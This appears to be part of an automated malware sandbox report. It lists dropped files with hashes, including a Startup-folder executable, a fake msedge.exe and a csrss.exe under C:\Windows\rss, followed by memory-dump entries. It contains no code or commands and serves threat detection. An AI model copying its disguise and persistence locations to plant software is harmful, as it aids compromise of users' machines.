C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3934047325-4097474570-3437169968-1000\0f5007522459c86e95ffcc62f32308f1_a5ca12e9-4e54-4b9b-953b-a3009b39c805

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\retero.exe

Filesize
57KB

MD5
1f60ceae23e78d5924d57503204080d8

SHA1
df4cce589ee09fbdb0442039dbc13db457e34987

SHA256
e4b2dc5238e186426de375758dde20e774107687f0704ac5ac8a50ddd1515cf8

SHA512
35982767840db3587baef25b857297ff57dac50cfc6736c1c16864713caf74feade6a6fb1b806bfe2365aa357796b4b491c29c9c00e910d9feb6bd2fd6f3b268

Download Submit
C:\Users\Admin\AppData\Roaming\dcfdbae

Filesize
23KB

MD5
07948ce5cfd3ab73aa76849b773cccd4

SHA1
865a243327ad9f48411f1a04a737f810ef691f2f

SHA256
2b06f60799a957e6f5cb6ba703f3605429950fa25e063da7ff61cd7ae7c17e4b

SHA512
dfd3d14fff409ae8ab316945848df54f0ebfbcea6802c4f996549eba9a1cf912177de7f9c0f2d24375fdc0153f0c7805a1ab010332329a8a91bbf6ccbddde84c

Download Submit
C:\Users\Admin\AppData\Roaming\msedge.exe

Filesize
114KB

MD5
c77fb6235fa40b13509c25f8aca8da6b

SHA1
af2c0a134a6deb56bfd7b9c54124ec8ffb30a7b6

SHA256
4bb0daf6ad46380eb905da9f586d108f9a9e7bd83c31d7903824ebe3abd65fb0

SHA512
57240e1b8f378c8e3d4524c16a6d95529a44de782c8029fe2458450b5a9881dd94241b70b8582379ae9079c5f5989c470b150d9949ed8b6be47f5e0799f64a0d

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe

Filesize
5KB

MD5
58be8a0267d37969e07e9c780ce56272

SHA1
bb16056b10ca4f26c702f86a409c411429793bbb

SHA256
e877a6e5adf274e9f7c4f53e1795c62e7fce85c726a1846f0f79f2b9223749af

SHA512
5e03374a1e242bc1032d7fd6e5df630c7997644d9aacaac9297a4bf6914a872675a48ecfbf7a98385d7249d1fd53dcab6b6a9668d2f3d2abfc8e3d094c750f36

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\liveupdate.exe

Filesize
6KB

MD5
6f572aa48d93b7f873588e816ae35008

SHA1
d764948b80d5ae7eb410746cc97c8806b4e2916e

SHA256
0c9b172afa74dcae477b0e60fbd414a6cdf6dd77b8ac963268c61799021b644e

SHA512
eada3204554bc8c8ed59908bfdf3acfcc12863d6be8db18c062fab976f9e90fac27cc0a7d19869103403bc4b566970861e0f3a6e66e297ee1a95cc0a5e96cd20

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\log.dll

Filesize
1KB

MD5
bcdeae2ea05b04a2b01b8d2e3de6f7b7

SHA1
049e087ce0e70dcbc879511f14a807cfd5b5fd29

SHA256
da9211eeeca3e42f03f41f340db5650354c3f5e1ecde132949acb8e2244dfcab

SHA512
0a15bfcd4d368efe4a509e8b8aee1b3d29cb973654f6a9f513830c8eff1e0813a0ca3bb83d92ea6f34ecd0d8349000ddc69175198caaae782000c8813624f46f

Download Submit
C:\Users\Admin\AppData\Roaming\wshom\xeroderma.wav

Filesize
23KB

MD5
1ed72c797e3a9ef0899c07bcf4159a69

SHA1
be4a738f7a9df1e13c7b1881b26d583ed9c04775

SHA256
aa64cd7047f3765d9e3bdf3d96a4bf17e69851bd5e64122d6853ad344a4ebdb1

SHA512
fe64be411522bad0fa35bd340d668732e9d93a4d8afe3b9b68b2de45b8936debc4adaf6c62800cb19e87775fd76d4ed5266dce8b1220fcb8db23ba3e4334d272

Download Submit
C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe

Filesize
127KB

MD5
9b6f01b664d63422d8606164ade49d2a

SHA1
95d948e38b1c32049da09f9ddbabac20df08d783

SHA256
d733ac6fc86a9fd8ea4052192c5cb879e16f5fc1f9ca6cb65d6f0b4e767b4aaf

SHA512
141bc550a5ea90d21eb3c76f75e1f6a16af0d0b2a2e84fdf9c7e0f9b843f15b95a97e7269828bcedf09c5333f82a080dfad1280fb7375e9cbed059a48c0b4dd9

Download Submit
C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe

Filesize
80KB

MD5
975d125dfc250d65292948af8b1f9889

SHA1
65c0cc74417d8ec3a4ef6daf696ebeac8627323c

SHA256
4517b01eb702af61646385a9470dc071d78a41aadebe53c2d3699b419cc55eae

SHA512
49f4e45dc14705a555461e266e44cfc19e8fec9cf80e36a0c0a4f3bb077ebc6064baf6eccb1ef77310f16e9354c65eec72d1048d5568b0b014e1202761a6ab2f

Download Submit
C:\Users\Admin\Quase xab xewo jati hohoval palibega wocisec-yofoc joy somigowi verodedi mije\Tat tow roc koyor manax wodebib haninew dolixo.exe

Filesize
71KB

MD5
5dcbf14a0033929ba79f631552303c7e

SHA1
38eea3ec4fa92ed794dcd41a214f2ee19435deb6

SHA256
866fc9a49b1cc5cd65caea2f7d5717906b343afa5c3acd09ca0ec4514ea8c356

SHA512
da4974a7c49afba3fd174594e3dfda9b035e650de9c98b5389c581b127076bffdc3e1dff04854518eea018013f335a901230e1bd9dda4cccc2ff1aa05c66cf0b

Download Submit
C:\Windows\rss\csrss.exe

Filesize
737KB

MD5
19163492a3937086d64280a2e9115f92

SHA1
6bf301ac8fae0d5ab1992476a61f3166bd06f6c4

SHA256
44124c218122a13a5fa5100ced0edaba9f8310f8cab0894030d39cdc922195f1

SHA512
53481a764cb4921021e11330e54114a7561d3b4379960988a5a1f2c720ad3fcdbf0556ff0986f528edfee507ce50c7f28741c937d3ac2b6a19c18bbb6c9251ce

Download Submit
\Users\Admin\AppData\Local\Temp\R6h3R.cpl

Filesize
163KB

MD5
668b9f7b38f3ec88f7a1741cb5991222

SHA1
1229618611f8eb0fda2013fb73fdb14e66f2e7f2

SHA256
5b31408134fd6da90679a6a0c17ac40c9bf5e1a2cb2465a529930a1517cfe4c4

SHA512
dc15ffbe4466146a620aa3246abf913aca8467e70bd73dd53b05d627261b03fb3b46d2db1df34796d6be6e0f96cef330949db97d087dfa5ff6f78e5dea7e9cbc

Download Submit
\Users\Admin\AppData\Local\Temp\is-CS1UU.tmp\_isetup\_iscrypt.dll

Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
\Users\Admin\AppData\Local\Temp\is-CS1UU.tmp\_isetup\_isdecmp.dll

Filesize
19KB

MD5
3adaa386b671c2df3bae5b39dc093008

SHA1
067cf95fbdb922d81db58432c46930f86d23dded

SHA256
71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38

SHA512
bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

Download Submit
\Users\Admin\AppData\Local\Temp\is-EH825.tmp\_isetup\_isdecmp.dll

Filesize
4KB

MD5
bd31b59e505efddc7a1ef03ad6dad96a

SHA1
6b084c1ebf4415aef9955933aa605e55b2241190

SHA256
0d015b93b6778e0f3c19e7cee0ba1e8e075dbab15e5851353c267b4a321911b0

SHA512
2693b550e63e22d68e1f72d6a463fe5e74c1c3cff0188182eaed2b8057df92c7476f19330979320816a66dfd18724eefb9072d2110943263da6c1ba94001ae58

Download Submit
\Users\Admin\AppData\Local\Temp\is-U725G.tmp\_isetup\_isdecmp.dll

Filesize
15KB

MD5
b1efa2c59ba875c9bf9e971a2b1ae3d7

SHA1
7d26adeebc5ad3294e11e1a151025ec1091d13c5

SHA256
a1f7d84c8eb97dfedc182b72cc9ccb1508b0c1ac6d6e110bff789eb6e1a65571

SHA512
8e4faa00d0ba87ed8b49500d7a9b600862dd4364a1320a1330552c79b4747a512a5576e47f17c954c317c3e990efa1ccc1cf8abcab680ad3426e0ea0de6ad3cb

Download Submit
\Users\Admin\AppData\Roaming\wshom\log.dll

Filesize
18KB

MD5
b87c6b5cd40d8c054fc69532a439964f

SHA1
7e59f8d56c9f070e69388a9c3d7c98046862ef51

SHA256
136f71d795ae2489cf08162b7fa49e35dbcc37cd5095ae42c1d776e1a051c415

SHA512
54f1ea4b2e615b4aef2a67ad05302ea79b20c50caba011f9d8ef8e85c38b5100bdcebad8576b71619cc12d9b4169121538a48ca5822db753f36066ae1e1bad89

Download Submit
memory/668-447-0x000000000EFE0000-0x000000000F0E2000-memory.dmp

Filesize
1.0MB

Download
memory/668-267-0x0000000073030000-0x000000007371E000-memory.dmp

Filesize
6.9MB

Download
memory/668-282-0x000000000E690000-0x000000000E6A2000-memory.dmp

Filesize
72KB

Download
memory/668-347-0x000000000C810000-0x000000000C830000-memory.dmp

Filesize
128KB

Download
memory/668-420-0x000000000BDF0000-0x000000000BE00000-memory.dmp

Filesize
64KB

Download
memory/668-270-0x000000000C110000-0x000000000C60E000-memory.dmp

Filesize
5.0MB

Download
memory/668-271-0x000000000BCB0000-0x000000000BD42000-memory.dmp

Filesize
584KB

Download
memory/668-275-0x000000000BDF0000-0x000000000BE00000-memory.dmp

Filesize
64KB

Download
memory/668-276-0x00000000055A0000-0x00000000055AA000-memory.dmp

Filesize
40KB

Download
memory/668-280-0x000000000CE60000-0x000000000D466000-memory.dmp

Filesize
6.0MB

Download
memory/668-281-0x000000000E6C0000-0x000000000E7CA000-memory.dmp

Filesize
1.0MB

Download
memory/668-284-0x000000000E850000-0x000000000E89B000-memory.dmp

Filesize
300KB

Download
memory/668-457-0x000000000F2C0000-0x000000000F482000-memory.dmp

Filesize
1.8MB

Download
memory/668-398-0x000000000EB20000-0x000000000EB86000-memory.dmp

Filesize
408KB

Download
memory/668-261-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/668-388-0x0000000073030000-0x000000007371E000-memory.dmp

Filesize
6.9MB

Download
memory/668-283-0x000000000E810000-0x000000000E84E000-memory.dmp

Filesize
248KB

Download
memory/784-318-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2064-166-0x0000000000C90000-0x0000000000D10000-memory.dmp

Filesize
512KB

Download
memory/2064-168-0x0000000076F52000-0x0000000076F53000-memory.dmp

Filesize
4KB

Download
memory/2064-173-0x0000000002600000-0x00000000026D0000-memory.dmp

Filesize
832KB

Download
memory/2064-177-0x0000000000C90000-0x0000000000D10000-memory.dmp

Filesize
512KB

Download
memory/2168-199-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/2168-172-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2168-16-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2232-411-0x0000000002580000-0x00000000025E5000-memory.dmp

Filesize
404KB

Download
memory/2232-409-0x0000000000AE0000-0x0000000000BE0000-memory.dmp

Filesize
1024KB

Download
memory/2232-412-0x0000000002AC0000-0x0000000002B10000-memory.dmp

Filesize
320KB

Download
memory/2232-410-0x0000000002900000-0x0000000002954000-memory.dmp

Filesize
336KB

Download
memory/2232-414-0x0000000002AC0000-0x0000000002B0C000-memory.dmp

Filesize
304KB

Download
memory/2232-424-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/2232-422-0x0000000073030000-0x000000007371E000-memory.dmp

Filesize
6.9MB

Download
memory/2232-419-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/2232-417-0x00000000028F0000-0x0000000002900000-memory.dmp

Filesize
64KB

Download
memory/2232-413-0x0000000000400000-0x0000000000923000-memory.dmp

Filesize
5.1MB

Download
memory/2304-300-0x0000000000400000-0x00000000005A9000-memory.dmp

Filesize
1.7MB

Download
memory/2304-299-0x00000000021C0000-0x000000000220A000-memory.dmp

Filesize
296KB

Download
memory/2304-298-0x00000000005C0000-0x00000000006C0000-memory.dmp

Filesize
1024KB

Download
memory/2368-240-0x0000000001060000-0x0000000001066000-memory.dmp

Filesize
24KB

Download
memory/2368-239-0x0000000010000000-0x0000000010263000-memory.dmp

Filesize
2.4MB

Download
memory/2368-242-0x0000000005150000-0x000000000526E000-memory.dmp

Filesize
1.1MB

Download
memory/2368-243-0x0000000005280000-0x0000000005381000-memory.dmp

Filesize
1.0MB

Download
memory/2368-268-0x0000000010000000-0x0000000010263000-memory.dmp

Filesize
2.4MB

Download
memory/2368-246-0x0000000005280000-0x0000000005381000-memory.dmp

Filesize
1.0MB

Download
memory/2416-363-0x00000000021E0000-0x0000000002816000-memory.dmp

Filesize
6.2MB

Download
memory/2416-396-0x0000000002C60000-0x0000000002D9A000-memory.dmp

Filesize
1.2MB

Download
memory/2416-296-0x000000000DCA0000-0x000000000DF9D000-memory.dmp

Filesize
3.0MB

Download
memory/2416-269-0x0000000002C60000-0x0000000002D9A000-memory.dmp

Filesize
1.2MB

Download
memory/2416-294-0x000000000DCA0000-0x000000000DF9D000-memory.dmp

Filesize
3.0MB

Download
memory/2416-254-0x00000000021E0000-0x0000000002816000-memory.dmp

Filesize
6.2MB

Download
memory/2916-346-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2916-345-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2916-368-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2916-344-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2916-343-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2916-340-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/2924-223-0x0000000002BB0000-0x0000000002CEE000-memory.dmp

Filesize
1.2MB

Download
memory/2924-216-0x0000000002230000-0x0000000002866000-memory.dmp

Filesize
6.2MB

Download
memory/2936-279-0x0000000000430000-0x0000000000431000-memory.dmp

Filesize
4KB

Download
memory/3116-361-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3160-155-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/3160-151-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/3160-150-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/3536-195-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-192-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-209-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-175-0x0000000076F52000-0x0000000076F53000-memory.dmp

Filesize
4KB

Download
memory/3536-178-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-182-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-187-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-188-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-197-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-181-0x0000000000830000-0x0000000000831000-memory.dmp

Filesize
4KB

Download
memory/3536-183-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-198-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-196-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-184-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-194-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-193-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-189-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-191-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-186-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-185-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3536-190-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/3652-11-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3652-9-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3652-167-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3792-306-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/4268-397-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/4676-171-0x00000000008B0000-0x00000000008B0000-memory.dmp

Download
memory/4748-205-0x0000000005750000-0x0000000005790000-memory.dmp

Filesize
256KB

Download
memory/4748-1-0x0000000004B30000-0x0000000004BCC000-memory.dmp

Filesize
624KB

Download
memory/4748-3-0x0000000004A80000-0x0000000004A90000-memory.dmp

Filesize
64KB

Download
memory/4748-2-0x0000000073030000-0x000000007371E000-memory.dmp

Filesize
6.9MB

Download
memory/4748-160-0x0000000073030000-0x000000007371E000-memory.dmp

Filesize
6.9MB

Download
memory/4748-0-0x0000000000240000-0x0000000000248000-memory.dmp

Filesize
32KB

Download
memory/4984-157-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-204-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-201-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-249-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-200-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-208-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-159-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-295-0x0000000000400000-0x0000000000589000-memory.dmp

Filesize
1.5MB

Download
memory/4984-433-0x0000000000830000-0x00000000008D2000-memory.dmp

Filesize
648KB

Download